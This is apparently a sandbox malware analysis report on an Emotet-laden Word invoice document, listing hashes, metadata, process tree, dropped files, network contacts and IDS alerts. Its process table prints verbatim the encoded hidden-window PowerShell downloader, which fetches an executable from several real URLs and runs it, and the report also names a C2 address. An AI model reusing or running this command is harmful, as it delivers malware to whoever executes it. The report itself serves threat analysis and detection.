File name: | Rechnung_2020_01.doc |
Full analysis: | https://app.any.run/tasks/17f0dc0a-3e34-4bdb-b2d9-db8fd258a1f9 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 17, 2020, 13:57:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Molestiae., Author: Nicolas Le roux, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 07:06:00 2020, Last Saved Time/Date: Fri Jan 17 07:06:00 2020, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0 |
MD5: | 4E6E2CAA147784FB077A2EF66CCD749D |
SHA1: | C1D2C89B181345046726A1B405277A237887241E |
SHA256: | CD2CCCB0030BCC24A3C68A8B6B3C646F64E132AEE4B1F25895CC07BC735B764B |
SSDEEP: | 6144:K70Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+FCJuvrwv:W0E3dxtR/iU9mvUPHrwv |
.doc | | | Microsoft Word document (80) |
---|
Title: | Molestiae. |
---|---|
Subject: | - |
Author: | Nicolas Le roux |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:01:17 07:06:00 |
ModifyDate: | 2020:01:17 07:06:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 23 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 26 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 25 |
CompObjUserType: | Microsoft Forms 2.0 Form |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2160 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rechnung_2020_01.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3860 | Powershell -w hidden -en JABLAHEAbABkAGYAbQBiAHYAcgA9ACcAWABpAGQAdgBvAHIAYgBrAGsAYwBnAHQAYQAnADsAJABGAHkAbQBiAGgAeQBlAHgAbQBoACAAPQAgACcANQA5ADMAJwA7ACQATgBuAHIAZwBxAGkAawBrAGYAcQB5AD0AJwBCAGoAcwBwAGMAcABzAGUAYwBxAGYAJwA7ACQATwBzAHgAagBzAHUAdgBiAGIAeAB6AGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEYAeQBtAGIAaAB5AGUAeABtAGgAKwAnAC4AZQB4AGUAJwA7ACQAUQBlAGUAdwBsAG8AaAB2AG4AaAB6AGoAZwA9ACcAVABxAHkAdABqAHgAaQB0AG8AZAB4AHoAZgAnADsAJABQAHYAcQBrAHIAbgBvAGEAbwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgBXAGUAYgBjAEwASQBFAG4AdAA7ACQARgBrAG0AbgBnAGkAdABnAGEAPQAnAGgAdAB0AHAAOgAvAC8AbwBuAGkAbwBuAGcAYQBtAGUAcwAuAGoAcAAvAGMAbwBuAHQAYQBjAHQALwBpAFkALwAqAGgAdAB0AHAAOgAvAC8AcABtAHQAaABvAG0AZQAuAGMAbwBtAC8AcABvAHMAdABhAC8AZAByADMAegB4AGEALwAqAGgAdAB0AHAAOgAvAC8AdQByAGcAZQB2AGUAbgB0AGEALgBlAHMALwBpAG0AZwAvAGsAMwA1AGQAOQBxAC8AKgBoAHQAdABwAHMAOgAvAC8AcwBvAGwAbQBlAGMALgBjAG8AbQAuAGEAcgAvAHMAaQB0AGkAbwAvAG4AVABYAFoAbwBtAEsAQwB4AC8AKgBoAHQAdABwAHMAOgAvAC8AdABpAGEAZwBvAGMAYQBtAGIAYQByAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBzADkANgAvACcALgAiAFMAcABMAGAASQBUACIAKAAnACoAJwApADsAJABYAG0AdgB0AHMAZgBmAGoAZgBqAD0AJwBOAGIAcwBmAHYAYQB2AGsAbQBzAGwAYgAnADsAZgBvAHIAZQBhAGMAaAAoACQAUQB0AHkAawBtAGcAcAB5AHkAYwB6AHkAIABpAG4AIAAkAEYAawBtAG4AZwBpAHQAZwBhACkAewB0AHIAeQB7ACQAUAB2AHEAawByAG4AbwBhAG8ALgAiAGQAYABPAFcAbgBsAG8AYQBgAEQAZgBJAGwARQAiACgAJABRAHQAeQBrAG0AZwBwAHkAeQBjAHoAeQAsACAAJABPAHMAeABqAHMAdQB2AGIAYgB4AHoAYwApADsAJABMAHEAcwBuAG8AYwBpAGMAawA9ACcATQB3AHIAbgBoAHMAawB6AGUAdQBzACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQATwBzAHgAagBzAHUAdgBiAGIAeAB6AGMAKQAuACIAbABgAGUATgBnAGAAVABoACIAIAAtAGcAZQAgADMANgA5ADUAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABBAFIAdAAiACgAJABPAHMAeABqAHMAdQB2AGIAYgB4AHoAYwApADsAJABaAGoAYwB5AGUAYgB0AHUAPQAnAFAAcQByAHYAaABrAGwAcQBlAHIAaQBlACcAOwBiAHIAZQBhAGsAOwAkAEYAegBiAGIAdQBuAHQAdQB1AGwAcABzAGcAPQAnAE0AdQBzAG0AeAB4AHEAYgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAYgByAGgAdAB2AGcAZgB0AGYAegBzAD0AJwBCAHYAdgBnAGcAcABkAGkAawBzAHcAcQByACcA | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1244 | "C:\Users\admin\593.exe" | C:\Users\admin\593.exe | — | Powershell.exe |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
3720 | --6b95206d | C:\Users\admin\593.exe | 593.exe | |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
460 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 593.exe |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2104 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | serialfunc.exe | |
User: admin Integrity Level: MEDIUM Description: PromptEdit_Demo MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA785.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF425B0D82AC3916BA.TMP | — | |
MD5:— | SHA256:— | |||
3860 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3PCRVV8O45T52Y42OSUY.temp | — | |
MD5:— | SHA256:— | |||
2160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:0AF652A9DD4FAE382A4B0F03424EE38D | SHA256:466C8FB022E57E7021388B3D87474E11B7560034982B56286C04A69A873A32FA | |||
2160 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:45822EE62FC571A3151895E367644231 | SHA256:EB3C643FA978D554A4FC475FB2EC2D439467CBEED53546B5218462C2B3EC2CB5 | |||
3860 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b0bc.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
3860 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$chnung_2020_01.doc | pgc | |
MD5:924CF77160CA0742DEE6CBC931DD6EC5 | SHA256:57BF5A0DC95C3168FFE0B74B24494D6DA5BD2CD2B6E970881FEA8C868B80D8B8 | |||
3720 | 593.exe | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | executable | |
MD5:EE75731A0A42AEF85E62BD3F89849061 | SHA256:C381FD7FE101A46C3D5006F4768F8E860051343A7CFC29E7EDD14D6720462B1A | |||
3860 | Powershell.exe | C:\Users\admin\593.exe | executable | |
MD5:EE75731A0A42AEF85E62BD3F89849061 | SHA256:C381FD7FE101A46C3D5006F4768F8E860051343A7CFC29E7EDD14D6720462B1A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2104 | serialfunc.exe | POST | — | 68.172.243.146:80 | http://68.172.243.146/chtMHcj2x5LAjUN5Aez | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3860 | Powershell.exe | 210.224.185.151:80 | oniongames.jp | SAKURA Internet Inc. | JP | suspicious |
2104 | serialfunc.exe | 68.172.243.146:80 | — | Time Warner Cable Internet LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
oniongames.jp |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3860 | Powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3860 | Powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3860 | Powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |